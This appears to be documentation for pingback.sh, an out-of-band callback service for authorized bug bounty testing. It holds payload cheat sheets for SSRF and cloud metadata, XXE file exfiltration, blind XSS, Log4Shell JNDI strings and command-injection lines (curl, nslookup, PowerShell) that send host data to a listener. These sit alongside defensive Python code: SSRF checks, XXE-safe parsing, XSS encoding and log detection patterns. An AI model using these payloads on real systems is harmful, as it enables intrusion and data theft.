Overview
pingback.sh is an out-of-band (OOB) testing platform built for bug bounty hunters,
penetration testers and security teams.
It captures incoming DNS, HTTP, HTTPS, SMTP and blind XSS callbacks from your targets and shows them in a live dashboard with useful context such as headers, body, source IP, country, ASN, reverse DNS, user-agent and protocol type.
Use it when you suspect a vulnerability that does not reflect output directly in the HTTP response: SSRF, blind SSRF, blind XSS in admin panels, XXE, blind XXE, server-side template injection, Log4Shell-style injections, command injection without stdout, SMTP-based bugs and other callback-based findings.
Firefox Add-on
Pingback.sh also provides a free Firefox extension for researchers who want to test forms faster.
The extension can scan pages, discover forms and inject payloads intelligently into fields that are likely to accept URLs, webhooks, callback endpoints, image sources, import links or other SSRF-prone inputs.
- Automatic form discovery
- Smart SSRF payload injection
- One-click listener generation
- Fast testing of URL, webhook and callback fields
- Direct integration with pingback.sh
Install it here: Pingback.sh Helper on Mozilla Add-ons
Getting started
Generate a listener from your dashboard. You'll receive:
- ✓ A unique subdomain like xyz1abc2.pingback.sh
- ✓ Ready-to-paste payloads for HTTP, DNS, XSS and SMTP
- ✓ A secret dashboard URL to view your captures
- ✓ Optional email, Discord and Telegram notifications
Payloads cheat sheet
For a listener at xxx.pingback.sh, drop any of these in suspicious inputs:
| Protocol | Payload | Triggers when |
|---|---|---|
| HTTP/HTTPS | https://xxx.pingback.sh/ | Target makes an outbound HTTP request |
| DNS | xxx.pingback.sh | Target's DNS resolver looks up the hostname |
| Blind XSS | "><script src=//xxx.pingback.sh/x></script> | Target's user, such as an admin, renders your payload |
| SMTP | anything@xxx.pingback.sh | Target sends an email to this address |
SSRF (Server-Side Request Forgery)
Replace any URL parameter, webhook field or fetched-resource input with your listener URL.
POST /api/import?url=https://xxx.pingback.sh/
POST /webhooks
{ "callback": "https://xxx.pingback.sh/secret" }
GET /image-proxy?src=https://xxx.pingback.sh/a.png
Cloud metadata testing
Use your listener as the canary first. Confirm the callback before testing internal or cloud metadata endpoints.
?url=http://xxx.pingback.sh/test # confirm SSRF works
?url=http://169.254.169.254/latest/meta-data/ # AWS metadata
?url=http://metadata.google.internal/computeMetadata/v1/ # GCP
DNS-only SSRF
When HTTP egress is blocked but DNS resolution works:
?url=https://xxx.pingback.sh/anything
If you see a DNS hit but no HTTP hit, the target resolved your domain but could not reach it.
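The check a fetching service needs in order to survive the tests above, as an added Python example that is not pingback.sh's code: it rejects non-HTTP schemes, IP literals and hostnames that resolve to link-local, loopback or private space (including the IPv4-mapped IPv6 form of the AWS metadata address), and treats any resolver failure as a deny. `DENIED_HOSTNAMES`, `FAKE_DNS`, `fake_resolver` and the addresses in the name table are constructed for the demo; `resolve_all` uses the real system resolver.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Names that are never fetched regardless of what they resolve to.
# metadata.google.internal is the GCP name from the cheat sheet above;
# "localhost" is an assumed addition.
DENIED_HOSTNAMES = {"metadata.google.internal", "localhost"}

# Constructed name table so the demo and tests run offline; production
# code passes resolve_all() instead.
FAKE_DNS = {
    "xxx.pingback.sh": {"93.184.216.34"},            # listener: public address
    "metadata.google.internal": {"169.254.169.254"},  # cloud metadata
    "intranet.example": {"10.0.0.5"},                 # RFC 1918 host
}


def resolve_all(hostname):
    """Every address the system resolver returns for hostname.

    This lookup is itself the "DNS hit without an HTTP hit" from the section
    above: a fetcher that validates a name before connecting still sends the
    query to the listener's authoritative server.
    """
    return {info[4][0] for info in socket.getaddrinfo(hostname, None)}


def fake_resolver(hostname):
    return FAKE_DNS[hostname]  # KeyError for unknown names -> denied below


def is_public_address(ip_text):
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(ip_text)
    # Apply IPv4 rules to mapped forms such as ::ffff:169.254.169.254.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    # is_global is False for loopback, link-local (169.254.0.0/16), RFC 1918,
    # shared address space, documentation ranges and the unspecified address.
    return ip.is_global and not ip.is_multicast


def check_outbound_url(url, resolver=resolve_all):
    """Return (allowed, reason) for a user-supplied URL a server would fetch."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, f"scheme {parts.scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "no host in URL"
    if host.lower() in DENIED_HOSTNAMES:
        return False, f"hostname {host} is denied"
    try:
        addresses = {str(ipaddress.ip_address(host))}  # IP literal in the URL
    except ValueError:
        try:
            addresses = set(resolver(host))
        except Exception as exc:  # a resolver failure is a deny, not a pass
            return False, f"cannot resolve {host}: {exc}"
    for addr in addresses:
        if not is_public_address(addr):
            return False, f"{host} resolves to non-public {addr}"
    return True, "ok"


if __name__ == "__main__":
    for candidate in (
        "https://xxx.pingback.sh/test",
        "http://169.254.169.254/latest/meta-data/",
        "http://metadata.google.internal/computeMetadata/v1/",
        "http://[::ffff:169.254.169.254]/",
        "file:///etc/passwd",
    ):
        print(candidate, "->", check_outbound_url(candidate, resolver=fake_resolver))
```

Two things to verify in a real fetcher: the check has to run again on every redirect hop, and the connection must go to the address that was checked (resolve once, connect to that IP, send the Host header yourself), otherwise a name whose answer changes between the check and the fetch slips past it. Note also what passes: the listener itself, because it sits at a public address. This check limits where a fetch can reach inside the network; only an egress allowlist stops the callback the dashboard records.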
XXE (XML External Entity)
Inject an external entity that references your listener:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "https://xxx.pingback.sh/xxe">
]>
<foo>&xxe;</foo>
Blind XXE with parameter entities
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "https://xxx.pingback.sh/exfil.dtd">
%dtd;
]>
Host exfil.dtd on a controlled server, with:
<!ENTITY % all "<!ENTITY % send SYSTEM 'https://xxx.pingback.sh/?d=%file;'>">
%all;
%send;
The captured request path may contain the requested file content if the parser allows external entities.
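A parser that closes the channel both payloads above depend on, as an added Python example (not the project's code): it drives the standard-library expat parser directly and refuses any DOCTYPE or entity declaration before a single external reference can be followed, which is what `defusedxml` or lxml's `resolve_entities=False` do for you. `XXE_SAMPLE` is the inline payload from this section embedded as test input; `BENIGN_SAMPLE`, `parse_untrusted_xml` and `rejects` are constructed names.

```python
import xml.parsers.expat

# The inline XXE document from the section above, embedded as test input.
XXE_SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "https://xxx.pingback.sh/xxe">
]>
<foo>&xxe;</foo>"""

# Constructed document with no DTD at all.
BENIGN_SAMPLE = "<order><id>42</id><note>plain text</note></order>"


class XxeBlocked(ValueError):
    """Raised when untrusted input carries a DTD or an entity declaration."""


def parse_untrusted_xml(data):
    """Parse XML from an untrusted source with DTD processing refused.

    Returns a flat list of (tag, text) pairs in end-tag order; the output
    shape is for this example only. Any <!DOCTYPE> or <!ENTITY> aborts the
    parse, so neither an inline entity nor a parameter entity that pulls an
    external DTD is ever resolved.
    """
    parser = xml.parsers.expat.ParserCreate()
    elements = []
    stack = []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise XxeBlocked(f"DOCTYPE {name!r} not allowed in untrusted input")

    def on_entity_decl(name, is_param, value, base, sysid, pubid, notation):
        raise XxeBlocked(f"entity declaration {name!r} not allowed")

    def on_external_ref(context, base, sysid, pubid):
        # Defence in depth: returning 0 makes expat fail the parse instead
        # of fetching sysid, should a declaration ever get this far.
        return 0

    def on_start(tag, attrs):
        stack.append([tag, []])

    def on_chars(text):
        if stack:
            stack[-1][1].append(text)

    def on_end(tag):
        name, chunks = stack.pop()
        elements.append((name, "".join(chunks)))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.ExternalEntityRefHandler = on_external_ref
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_chars
    parser.EndElementHandler = on_end
    parser.Parse(data, True)
    return elements


def rejects(data):
    """True if parse_untrusted_xml refuses data because of a DTD or entity."""
    try:
        parse_untrusted_xml(data)
    except XxeBlocked:
        return True
    return False


if __name__ == "__main__":
    print(parse_untrusted_xml(BENIGN_SAMPLE))
    print("XXE sample rejected:", rejects(XXE_SAMPLE))
```

The same rule should apply to every parser in the request path, including the ones inside libraries that read SOAP, SAML, RSS or document formats; a single endpoint that still honours a DOCTYPE is enough to produce the capture described above.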
Blind XSS
The Blind XSS payload at /x helps prove that a stored payload was rendered by another user,
such as an admin, support agent or back-office operator.
Common contexts
// HTML context
<script src=//xxx.pingback.sh/x></script>
// Attribute context
"><script src=//xxx.pingback.sh/x></script>
'><script src=//xxx.pingback.sh/x></script>
// JavaScript string context
';document.body.appendChild(document.createElement('script')).src='//xxx.pingback.sh/x';//
Where to inject
- Profile fields: name, bio, company
- Support ticket subjects and bodies
- Filenames on file uploads
- Referer and User-Agent headers
- Comments rendered in internal dashboards
- Search queries logged in admin panels
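The other side of the contexts listed above is context-specific output encoding in whatever dashboard renders the captured fields, shown here as an added Python example (not the project's code): each of the four payloads from Common contexts is passed through the HTML text, attribute and JavaScript string encoders a template should apply, and `is_neutralized` confirms that no tag or quote break survives. `render_admin_row`, `BLIND_XSS_PAYLOADS` and the encoder names are constructed for this example.

```python
import html
import json

# The four payloads from Common contexts, embedded as test input.
BLIND_XSS_PAYLOADS = [
    "<script src=//xxx.pingback.sh/x></script>",
    '"><script src=//xxx.pingback.sh/x></script>',
    "'><script src=//xxx.pingback.sh/x></script>",
    "';document.body.appendChild(document.createElement('script'))"
    ".src='//xxx.pingback.sh/x';//",
]


def encode_for_html_text(value):
    """For text between tags: & < > " ' become entities."""
    return html.escape(value, quote=True)


def encode_for_html_attribute(value):
    """For values inside a quoted attribute; the same five characters."""
    return html.escape(value, quote=True)


def encode_for_js_string(value):
    """Emit value as one complete JavaScript string literal.

    json.dumps quotes and escapes it; < > & are additionally escaped so a
    value containing </script> cannot close the surrounding script block.
    """
    literal = json.dumps(value)
    return (literal.replace("<", "\\u003c")
                   .replace(">", "\\u003e")
                   .replace("&", "\\u0026"))


def render_admin_row(field, value):
    """Constructed template for one captured header in an internal dashboard.

    The captured value lands in all three contexts named above: HTML text,
    a quoted attribute, and a JavaScript string.
    """
    return (
        f'<tr><td title="{encode_for_html_attribute(field)}">'
        f"{encode_for_html_text(value)}</td>"
        f"<td><script>var last = {encode_for_js_string(value)};</script></td></tr>"
    )


def is_neutralized(value):
    """True if rendering value adds no tag and keeps the JS literal intact."""
    rendered = render_admin_row("User-Agent", value)
    # The template contributes exactly one <script> pair; any other tag
    # would have come from the value.
    template_script_ok = (rendered.count("<script") == 1
                          and rendered.count("</script") == 1)
    # Decoding the emitted literal must give back exactly the input, which
    # proves the value is one string and not a quote break plus code.
    js_roundtrip_ok = json.loads(encode_for_js_string(value)) == value
    return template_script_ok and js_roundtrip_ok


if __name__ == "__main__":
    for payload in BLIND_XSS_PAYLOADS:
        print(is_neutralized(payload), render_admin_row("User-Agent", payload))
```

Because the fields in the list above (headers, filenames, ticket bodies) reach the dashboard from outside, the encoding belongs in the template engine by default rather than per call site, and a Content-Security-Policy with a nonce-based `script-src` gives a second layer: a `<script src=//xxx.pingback.sh/x>` that slips through a missed encoding still does not load.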
Log4j / JNDI injection
For Log4Shell-style bugs, inject into fields likely to be logged:
${jndi:ldap://xxx.pingback.sh/a}
${jndi:dns://xxx.pingback.sh}
${jndi:rmi://xxx.pingback.sh/a}
Headers to try: User-Agent, Referer, X-Forwarded-For and X-Api-Version. Even a DNS hit can confirm that a lookup happened.
Command injection (out-of-band confirmation)
When the response does not reflect command output, use the listener to confirm execution:
# Linux
; curl https://xxx.pingback.sh/$(whoami)
| nslookup $(hostname).xxx.pingback.sh
`wget -O- https://xxx.pingback.sh/proof`
# Windows
& nslookup %COMPUTERNAME%.xxx.pingback.sh
& powershell -c "iwr https://xxx.pingback.sh/$env:USERNAME"
The captured path can help prove execution when direct output is not visible.
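From the monitoring side, the same strings are detection signals. The added Python example below (not the project's code) runs a scanner over constructed web-server access-log lines and a constructed resolver query log: it flags `${jndi:` lookups in the request line, Referer and User-Agent after URL-decoding, inbound requests that mention an OOB listener domain, and outbound DNS queries from internal hosts for names under that domain, which is what the DNS-only hit described earlier looks like from inside the network. `OAST_DOMAINS`, both log formats and every address are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Listener domains in use for your program; constructed list with the page's domain.
OAST_DOMAINS = ("pingback.sh",)

JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Combined log format: src ident user [time] "request" status bytes "referer" "ua"
ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Constructed resolver log format: time client "query" qtype qname
DNS_RE = re.compile(r"^(?P<time>\S+) (?P<client>\S+) query (?P<qtype>\S+) (?P<qname>\S+)$")

# Constructed sample lines (documentation-range client addresses).
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /api/import?url=https://xxx.pingback.sh/test HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://xxx.pingback.sh/a}"',
    '198.51.100.4 - - [10/Jan/2024:10:00:03 +0000] "GET /search?q=%24%7Bjndi%3Adns%3A%2F%2Fxxx.pingback.sh%7D HTTP/1.1" 200 88 "-" "curl/8.0"',
    '198.51.100.9 - - [10/Jan/2024:10:00:04 +0000] "GET /healthz HTTP/1.1" 200 2 "-" "kube-probe/1.29"',
]
SAMPLE_DNS_LOG = [
    "2024-01-10T10:00:01Z 10.0.0.5 query A xxx.pingback.sh",
    "2024-01-10T10:00:02Z 10.0.0.8 query A updates.example.net",
    "2024-01-10T10:00:03Z 10.0.0.5 query A web-01.xxx.pingback.sh",
]


def references_oast(text):
    """Substring match for free-text fields such as a query string or UA."""
    low = text.lower()
    return any(domain in low for domain in OAST_DOMAINS)


def is_oast_name(qname):
    """Suffix match for a DNS question name."""
    name = qname.lower().rstrip(".")
    return any(name == d or name.endswith("." + d) for d in OAST_DOMAINS)


def scan_access_line(line):
    """Findings for one access-log line as (kind, field) pairs."""
    m = ACCESS_RE.match(line)
    if not m:
        return []
    findings = []
    for field in ("request", "referer", "ua"):
        value = unquote(m.group(field))  # normalise %24%7B... to ${...
        if JNDI_RE.search(value):
            findings.append(("jndi-lookup", field))
        if references_oast(value):
            findings.append(("oast-reference", field))
    return findings


def scan_dns_line(line):
    """An internal host asking for a listener name is egress evidence."""
    m = DNS_RE.match(line)
    if not m or not is_oast_name(m.group("qname")):
        return []
    return [("oast-dns-egress", m.group("client"))]


def summarize(access_lines, dns_lines):
    """Count finding kinds across both logs."""
    counts = Counter()
    for line in access_lines:
        counts.update(kind for kind, _ in scan_access_line(line))
    for line in dns_lines:
        counts.update(kind for kind, _ in scan_dns_line(line))
    return counts


if __name__ == "__main__":
    for line in SAMPLE_ACCESS_LOG:
        print(scan_access_line(line), line[:60])
    for line in SAMPLE_DNS_LOG:
        print(scan_dns_line(line), line)
    print(summarize(SAMPLE_ACCESS_LOG, SAMPLE_DNS_LOG))
```

The outbound DNS rule is the one worth keeping after the inbound patterns go stale: a server that never needs to talk to the Internet asking for `web-01.xxx.pingback.sh` is the command-injection and DNS-only SSRF cases above seen from the resolver, and it fires regardless of which input carried the payload. Real JNDI detection also needs the nested-lookup and string-function forms that defeat a plain `${jndi:` match; this block shows only the forms on this page.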
SMTP / email-based bugs
Use anything@xxx.pingback.sh in:
- Password reset forms
- Invitation systems
- Newsletter signups
- Webhook configurations that send email on events
- Contact forms and support forms
You will see an SMTP hit with connection metadata, sender information and delivery details.
Notifications
When generating a listener, you can add:
- Email: receive an email when a hit arrives.
- Discord webhook: send rich notifications to your Discord channel.
- Telegram: receive instant mobile notifications through Telegram.
- Label: add a private tag like h1-acme-test to remember which test the listener belongs to.
You can also bookmark the dashboard URL and monitor hits directly from the live feed.
Dashboard
Your dashboard is at https://pingback.sh/dashboard?t=YOUR_SECRET_TOKEN.
- Live feed updates automatically
- Filter by protocol: HTTP, DNS, XSS, SMTP
- Click any hit to inspect headers, body and metadata
- View IP intelligence, ASN, country and reverse DNS
- Export captures to JSON for your report
- Wipe the listener and all its hits when you are done
Privacy
pingback.sh captures whatever the target sends to it. By design, this may include sensitive data:
internal IPs, headers, cookies, session tokens, email contents or request bodies.
- Your secret token is hashed before storage.
- Your dashboard URL is private and should be treated like an API key.
- The admin panel is designed for abuse handling and operational monitoring.
- Do not paste dashboard URLs in public reports, screenshots or chat logs.
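What "hashed before storage" means in practice, as an added Python example of the pattern rather than pingback.sh's implementation: the token comes from the OS CSPRNG, only its SHA-256 digest is kept, a lookup hashes the presented token, and wiping a listener deletes the record. `ListenerStore`, its method names and the subdomain format are constructed.

```python
import hashlib
import secrets


class ListenerStore:
    """Constructed in-memory listener registry illustrating hash-at-rest tokens."""

    def __init__(self):
        # sha256(token) -> listener record; the token itself is never kept.
        self._records = {}

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode("utf-8")).hexdigest()

    def create_listener(self, label=None):
        """Mint a listener; the returned token is shown to the user exactly once."""
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        subdomain = secrets.token_hex(4) + ".pingback.sh"  # assumed subdomain shape
        self._records[self._digest(token)] = {
            "subdomain": subdomain,
            "label": label,
            "hits": [],
        }
        return token

    def lookup(self, token):
        """Resolve a dashboard token to its record, or None.

        Only the digest is compared, so a database copy does not yield
        working dashboard URLs, and a forgotten token cannot be recovered
        from what is stored.
        """
        return self._records.get(self._digest(token))

    def wipe(self, token):
        """Delete the listener and all its hits; True if it existed."""
        return self._records.pop(self._digest(token), None) is not None

    def holds_plaintext(self, token):
        """Sanity check used by the tests: the token must appear nowhere in storage."""
        return token in self._records or token in repr(self._records)


if __name__ == "__main__":
    store = ListenerStore()
    token = store.create_listener("h1-acme-test")
    print("token shown once:", token)
    print("record:", store.lookup(token))
    print("plaintext stored:", store.holds_plaintext(token))
```

A plain SHA-256 is enough here, unlike for passwords, because the token is 256 random bits and cannot be guessed or brute-forced; the hash protects against disclosure of the stored table, not against a weak secret. The same reasoning is why the FAQ answer to a lost dashboard URL is to generate a new listener.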
FAQ
Can I use the Firefox add-on for free?
Yes. The Pingback.sh Helper add-on is free on Mozilla Add-ons. It helps scan pages, find forms and inject SSRF-oriented payloads intelligently into fields that look interesting.
Can I use this in a paid bug bounty program?
Yes. pingback.sh is a testing tool for OOB evidence collection. Always use it responsibly and only
within the authorized scope of the program you are testing.
Why do I get only DNS hits and no HTTP?
The target's DNS resolver looked up your domain, but an egress firewall may have blocked the actual HTTP request. This still provides useful evidence that the target attempted to resolve your controlled hostname.
Why use Pingback?
Pingback.sh gives you a dedicated web dashboard with DNS, HTTP, HTTPS, SMTP and Blind XSS monitoring, plus email, Discord and Telegram notifications. It also includes API access and a free Firefox extension for faster form testing and smart payload injection.
Are my captures private?
Captures are accessible through the secret dashboard URL for the listener. Keep this URL private and do not share it publicly.
I lost my dashboard URL. Can you recover it?
No. The dashboard token is the access key for the listener. If you lose it, generate a new listener.